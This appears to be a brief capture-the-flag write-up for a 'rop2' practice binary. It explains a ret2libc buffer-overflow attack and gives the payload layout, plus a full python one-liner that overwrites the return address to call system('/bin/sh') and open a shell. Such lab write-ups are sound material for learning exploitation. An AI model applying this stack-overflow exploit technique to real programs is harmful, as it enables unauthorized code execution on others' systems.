as same as rop-1. but, there is no function which call system('/bin/sh') like 'not_called' subroutine in rop-1. fortunately, there is a global variable called 'not_used' which value is '/bin/sh'. so, in this case we can use 'ret2libc' method to pwn that contrived binary. payload construction below:
["\x41"*(0x80 + 12) (in order to reach vulnerable_function return address)] + [libc_system addr] + [libc_exit addr (this is a fake libc_system return address)] + [address of 'not_used' global variable]
and then.. pwned!!
(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<I", 0x40067170) + struct.pack("<I", 0x4005cfc0) + struct.pack("<I", 0x8048610))'; cat -) | ./rop2-20f65dd0bcbe267d
[ got a terminal session even '$' not showed due of 'cat -' shit ]